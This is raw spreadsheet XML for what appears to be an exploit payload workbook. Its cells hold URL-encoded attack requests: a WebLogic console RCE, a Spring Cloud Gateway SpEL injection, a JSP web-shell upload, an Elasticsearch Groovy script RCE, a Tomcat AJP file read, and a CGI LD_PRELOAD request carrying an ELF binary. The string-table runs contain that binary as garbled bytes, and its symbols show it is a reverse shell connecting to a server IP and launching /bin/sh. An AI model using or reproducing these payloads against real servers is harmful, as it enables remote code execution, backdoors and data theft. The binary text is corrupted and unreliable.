        <scheme val="minor"/>
      </rPr>
      <t>H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ǅ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>耀f</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ǅ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">H_x0005_U_x0006_ _x000F_	</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ǩ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)fE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Cambria Math"/>
        <family val="2"/>
      </rPr>
      <t>∋</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0005_._x0006_ HHǸ达E䈍M</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>˅</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>ܺ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0010_HΉ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ǩ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>E4
觾E</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>ܾ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ǹ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>製E</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>ܾ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001_Ǹ菽E</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>ܾ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0002_Ǹ軽H=5赽HEdH3_x0004_%(t_x0005_谽</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ƀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>숈</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ĉ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>ñ0.82.200.214/bin/sh_x0001__x001B__x0003_;_x0018__x0002_&lt;4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>ܾ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">\_x0014__x0001_zR_x0001_x_x0010__x0001__x001B__x000C_ _x0008__x0001_$_x001C__x000E__x0010_F_x000E__x0018_J_x000F__x000B_w_x0008_?_x001A_;*3$"_x001C_Dx_x0002__x0001_A_x000E__x0010__x0002_C
_x0006__x0002__x000C_ _x0008__x0010_	@	</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ј</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
      </rPr>
      <t>̀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">_x000C_ 
D
_x0019_荠_x001B__x0010__x001A_
 _x001C__x0008_o_x0001__x0005_@_x0004__x0006_0_x0002_
_x0004__x0001__x000B__x0018__x0003__x0010_ _x0002__x0014_ _x0017__x0006_ _x0005__x0008_ _x0001_	_x0018_op_x0005_o_x0001_oD_x0005_o_x0005__x0008__x000E_  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ƈ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Sylfaen"/>
        <family val="2"/>
      </rPr>
      <t>և</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>懀 _x0006__x0008__x0016__x0008_&amp;_x0008_X_x0010_ _x0013_M
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609_x0003__x0001_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȁ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0003__x0002__x0001__x0003__x0003_0_x0002__x0003__x0004_@_x0004__x0003__x0005_D_x0005__x0003__x0006_p_x0005__x0003_ _x0005__x0003__x0008__x0006__x0003_	 _x0003_
 _x0003__x000B_0_x0008__x0003__x000C_@_x0008__x0003_
D
_x0003__x000E_M
_x0003__x000F_d
_x0003__x0010_
_x0003__x0011_荠_x0003__x0012_
 _x0003__x0013__x000E_ _x0003__x0014__x0008__x000E_ _x0003__x0015_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȏ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> _x0003__x0016__x0010_ _x0003__x0017_X_x0010_ _x0003__x0018_p_x0010_ _x0003__x0019__x0001__x0004__x000C__x0001__x0013__x000E_ _x0019__x0002__x000C_@_x0008__x001B__x0002__x000C__x0008_._x0002__x000C_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ј</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>D_x0001__x0018_p_x0010_ _x0001_S_x0001__x0012_
 z_x0002__x000C__x0010_	_x0001__x0011_荠_x0004__x0002__x000C_@	_x0002__x0001__x0001__x0004__x0001__x0010_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>ʀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ǀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001__x0013__x000E_ _x0004_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="204"/>
      </rPr>
      <t>Ӏ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">_x0001__x0017_X_x0010_ _x0001__x0014__x0008__x000E_ 退_x000F_d
_x0001__x0017_p_x0010_ _x0008__x0001__x0001__x0016__x0010_ _x001E__x0001_ :_x0001__x0010__x0017_p_x0010_ A_x0001__x0012_
D
G_x0001__x0012_c_x0001__x0012_v_x0001__x0012__x0001__x0011__x0017_h_x0010_ _x0008__x0001__x0012__x0001__x0012__x0001_ </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
      </rPr>
      <t>́</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">_x0010__x0018_x_x0010_ с_x0010__x0018_p_x0010_ </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>݁</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0011__x0017_`_x0010_ _x0004_遀 _x0001__x0012__x000F__x0002__x0012_$_x0002_ &gt;_x0002_"Z_x0002__x0012_	 `_x0002__x0012_crtstuff.c__JCR_LIST__deregister_tm_clones__do_global_dtors_auxcompleted.7594__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryexp.creverse_shell__FRAME_END____JCR_END____dso_handle_DYNAMIC__GNU_EH_FRAME_HDR__TMC_END___GLOBAL_OFFSET_TABLE__ITM_deregisterTMCloneTable_edata_fini__stack_chk_fail@@GLIBC_2.4htons@@GLIBC_2.2.5dup2@@GLIBC_2.2.5server_ipexecve@@GLIBC_2.2.5inet_addr@@GLIBC_2.2.5__gmon_start___end__bss_startserver_port_Jv_RegisterClassesexit@@GLIBC_2.2.5connect@@GLIBC_2.2.5_ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5_initsocket@@GLIBC_2.2.5.symtab.strtab.shstrtab.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.plt.data.bss.comment_x001B_ _x0002_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȁȁ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>$_x0004_.o_x0002__x0001__x0001_@_x0003__x0008_8_x000B__x0002_0_x0002_0_x0002__x0010__x0002__x0004__x0002__x0008__x0018_@_x0003__x0002_@_x0004_@_x0004__x0004__x0001__x0001_Ho_x0002_D_x0005_D_x0005_,_x0003__x0002__x0002_Uo_x0002_p_x0005_p_x0005_0_x0004__x0001__x0008_d_x0004__x0002__x0005__x0005_ _x0001__x0003__x0008__x0018_n_x0004_B_x0006__x0006__x0003__x0016__x0008__x0018_x_x0001__x0006_  _x001A__x0004_s_x0001__x0006_  _x0010__x0010_~_x0001__x0006_0_x0008_0_x0008__x0010__x0008__x0001__x0006_@_x0008_@_x0008__x0002__x0002__x0010__x0001__x0006_D
D
	_x0004__x0001__x0002_M
M
_x0016__x0001__x0001__x0002_d
d
_x001C__x0004__x0001__x0002_
d_x0008__x000E__x0003_荠荀_x0010__x0008__x000F__x0003_
_x0008__x0008_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>ˀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001__x0003__x000E_ _x000E__x0008__x0008_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="204"/>
      </rPr>
      <t>Ѐ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0006__x0003__x0008__x000E_ _x0008__x000E__x0001__x0004__x0008__x0010__x0001__x0003_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȏ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Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȏ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>8_x0008__x0008_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="178"/>
      </rPr>
      <t>ـ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001__x0003__x0010_ _x0010_X_x0008__x0008_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="MS Gothic"/>
        <family val="3"/>
        <charset val="128"/>
      </rPr>
      <t> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001__x0003_X_x0010_ X_x0010__x0018__x0008_耀_x0008__x0003_p_x0010_ p_x0010__x0008__x0001_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>퀀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001_0p_x0010_5_x0001__x0001__x0011__x0003_L_x0019__x0001__x0001__x0002__x0010_0_x0006__x001C_._x0008__x0018_	_x0003_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ؖ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>t_x0002__x0001_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</si>
</sst>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Segoe UI"/>
      <family val="2"/>
      <charset val="238"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="178"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Sylfaen"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Yu Gothic"/>
      <family val="2"/>
      <charset val="128"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Malgun Gothic"/>
      <family val="2"/>
      <charset val="129"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Segoe UI Historic"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Segoe UI"/>
      <family val="2"/>
      <charset val="161"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Nirmala UI"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Cambria Math"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Segoe UI"/>
      <family val="2"/>
      <charset val="204"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Tahoma"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Tahoma"/>
      <family val="2"/>
      <charset val="238"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="1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icrosoft New Tai Lue"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Gadugi"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11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indexed="64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AFF1-CCEA-48D6-8648-27584C9CBFC0}">
  <sheetPr codeName="Sheet1"/>
  <dimension ref="A1:D136"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A4" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="C4" sqref="C4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.15" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="39.78515625" customWidth="1"/>
    <col min="3" max="3" width="110.640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" ht="15.45" thickTop="1" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A1" s="4" t="s">
        <v>263</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C1" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="2" spans="1:4" ht="15" thickTop="1" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A2" s="2" t="s">
        <v>41</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C2" t="s">
        <v>42</v>
      </c>
      <c r="D2" t="str">
        <f>_xlfn.ENCODEURL(C2)</f>
        <v>GET%20%2Fconsole%2Fcss%2F%2525%2532%2565%2525%2532%2565%2525%2532%2566consolejndi.portal%3Ftest_handle%3Dcom.tangosol.coherence.mvel2.sh.ShellSession%28%27weblogic.work.ExecuteThread%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0Acmd%3A%20pwd%0A</v>
      </c>
    </row>
    <row r="3" spans="1:4" ht="269.14999999999998" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A3" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>130</v>
      </c>
      <c r="D3" t="str">
        <f t="shared" ref="D3:D66" si="0">_xlfn.ENCODEURL(C3)</f>
        <v>POST%20%2Factuator%2Fgateway%2Froutes%2Fhacktest%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F34.0.1847.137%20Safari%2F4E423F%0AConnection%3A%20close%0AContent-Length%3A%20307%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0A%0A%7B%0A%20%20%22id%22%3A%20%22hacktest%22%2C%0A%22filters%22%3A%20%5B%7B%0A%22name%22%3A%20%22AddResponseHeader%22%2C%0A%22args%22%3A%20%7B%0A%20%20%22name%22%3A%20%22Result%22%2C%0A%20%20%22value%22%3A%20%22%23%7Bnew%20String%28T%28org.springframework.util.StreamUtils%29.copyToByteArray%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28new%20String%5B%5D%7B%5C%22id%5C%22%7D%29.getInputStream%28%29%29%29%7D%22%0A%7D%0A%20%20%7D%5D%2C%0A%20%20%22uri%22%3A%20%22http%3A%2F%2Fexample.com%22%0A%7D</v>
      </c>
    </row>
    <row r="4" spans="1:4" ht="255" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A4" s="2" t="s">
        <v>243</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C4" s="5" t="s">
        <v>244</v>
      </c>
      <c r="D4" t="str">
        <f t="shared" si="0"/>
        <v>PUT%20%2Ffileserver%2F2.txt%20HTTP%2F1.1%0AContent-Length%3A%20359%0A%0A%3C%25%40%20page%20import%3D%22java.io.%2A%22%25%3E%0A%0A%3C%25%0A%20%20out.print%28%22Cytosine%20Test%3Cbr%3E%22%29%3B%0A%0A%20%20String%20strcmd%20%3D%20request.getParameter%28%22cmd%22%29%3B%0A%20%20String%20line%20%3D%20null%3B%0A%0A%20%20Process%20p%20%3D%20Runtime.getRuntime%28%29.exec%28strcmd%29%3B%0A%20%20BufferedReader%20br%20%3D%20new%20BufferedReader%28new%20InputStreamReader%28p.getInputStream%28%29%29%29%3B%0A%0A%20%20while%28%28line%3Dbr.readLine%28%29%29%21%3Dnull%29%7B%0A%20%20%20%20out.print%28line%2B%22%3Cbr%3E%22%29%3B%0A%20%20%7D%0A%25%3E</v>
      </c>
    </row>
    <row r="5" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A5" s="2" t="s">
        <v>3</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C5" t="s">
        <v>245</v>
      </c>
      <c r="D5" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F_search%3Fpretty%20HTTP%2F1.1%0AAccept%3A%20%2A%2F%2A%0AAccept-Language%3A%20en%0AUser-Agent%3A%20Mozilla%2F5.0%20%28compatible%3B%20MSIE%209.0%3B%20Windows%20NT%206.1%3B%20Win64%3B%20x64%3B%20Trident%2F5.0%29%0AConnection%3A%20close%0AContent-Type%3A%20application%2Ftext%0AContent-Length%3A%20156%0A%0A%7B%22size%22%3A1%2C%20%22script_fields%22%3A%20%7B%22lupin%22%3A%7B%22lang%22%3A%22groovy%22%2C%22script%22%3A%20%22java.lang.Math.class.forName%28%5C%22java.lang.Runtime%5C%22%29.getRuntime%28%29.exec%28%5C%22id%5C%22%29.getText%28%29%22%7D%7D%7D</v>
      </c>
    </row>
    <row r="6" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A6" s="2" t="s">
        <v>4</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C6" t="s">
        <v>246</v>
      </c>
      <c r="D6" t="str">
        <f t="shared" si="0"/>
        <v>%124%01%02%02%08HTTP%2F1.1%05%2Fasdf%0F192.168.137.139%0F192.168.137.139P%09%06%0Akeep-alive%0FAccept-Language%0Een-US%2Cen%3Bq%3D0.5%08%010%0FAccept-Encoding%13gzip%2C%20deflate%2C%20sdch%0ACache-Control%09max-age%3D0%0E%20Mozilla%19Upgrade-Insecure-Requests%011%01%09text%2Fhtml%0B%0F192.168.137.139%0A%21javax.servlet.include.request_uri%01%2F%0A%1Fjavax.servlet.include.path_info%0FWEB-INF%2Fweb.xml%0A%22javax.servlet.include.servlet_path%01%2F</v>
      </c>
    </row>
    <row r="7" spans="1:4" ht="409.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A7" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C7" s="5" t="s">
        <v>264</v>
      </c>
      <c r="D7" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fcgi-bin%2Findex%3FLD_PRELOAD%3D%2Fproc%2Fself%2Ffd%2F0%20HTTP%2F1.1%0AUser-Agent%3A%20curl%2F7.55.1%0AAccept%3A%20%2A%2F%2A%0AContent-Length%3A%208584%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AExpect%3A%20100-continue%0A%0A%7FELF%02%01%01%03%3E%01%40%08%40H%1A%408%20%40%1D%1A%01%05%E4%8A%80%E4%8A%80%20%01%06%E8%8D%80%E8%8D%A0%E8%8D%A0%02%02%20%02%06%08%0E%08%0E%20%08%0E%20%01%01%08%04%04%C8%81%C8%81%C8%81%24%24%04P%E5%B4%A4%04d%0Ad%0Ad%0A%1C%1C%04Q%E5%B4%A4%06%10R%E5%B4%A4%04%E8%8D%80%E8%8D%A0%E8%8D%A0%18%02%18%02%01%04%14%03GNUg%29%C3%AE%5Ex.lV%06hh%05%18%D9%80%03%0F%01%06%D0%A0%01%04P%09%0F%13%15BE%D5%AC4%E3%8F%9E%E3%92%BCa%D8%B1X%1C%0E%EB%93%AF%0E%03%09%20%1C%20%12%12%12%12%12%01%20a%20%12%128%20R%22%12%D6%80%10%17p%10%20u%11%17h%10%20%08%E9%80%80%10%18x%10%20%7F%11%17%60%10%20%04%DD%80%10%18p%10%20%10%12%09%20%16%12%0AD%0A__gmon_start___init_fini_ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalize_Jv_RegisterClassesserver_ipserver_portsockethtonsinet_addrconnectexitdup2execve__stack_chk_faillibc.so.6_edata__bss_start_endGLIBC_2.2.5GLIBC_2.4%02%03%03%03%03%03%03%03%03%01%01%01%01%01%01%01%01%02%CC%80%10u%1Ai%09%03%EE%80%80%10%14ii%0A%02%E8%8D%A0%08%10%09%0A%20%08%40%09%0A%20%08%D0%88X%10%20%08X%10%20h%10%20%08M%0A%C8%8F%20%06%02%D0%8F%20%06%10%D8%8F%20%06%08%CF%A0%06%12%E8%8F%A0%06%09%0F%20%06%0C%0F%20%06%0A%18%10%20%20%03%20%10%20%20%04%28%10%20%20%050%10%20%20%068%10%20%20%20%40%10%20%20%0AH%10%20%20%0BP%10%20%20%0EH%EC%88%88%05M%08%20H4%05%E8%9B%80H%C4%88%C3%805b%08%20%25d%08%20%0F%1F%40%25b%08%20h%E9%A0%BF%25Z%08%20h%01%E9%90%BF%25R%08%20h%02%E9%80%BF%25J%08%20h%03%E9%B0%BF%25B%08%20h%04%E9%A0%BF%25%3A%08%20h%05%E9%90%BF%252%08%20h%06%E9%80%BF%25%2A%08%20h%20%E9%B0%BF%25%20%20f%25%20%20fH%3D%29%08%20H%05%29%08%20UH%29H%E5%88%83%0Ev%15H%05f%20%20H4%09%5D%E0%A6%8F%1FD%5D%C3%8F%1F%40f.%0F%1FH%3D%E9%87%A0H5%E2%87%A0UH%29H%E5%88%81%03HHh%3FH%01%C6%88%D1%BEt%18H%05A%20%20H4%0C%5D%E0%A6%8F%1F%5D%C3%8F%1F%40f.%0F%1F%3D%20%20u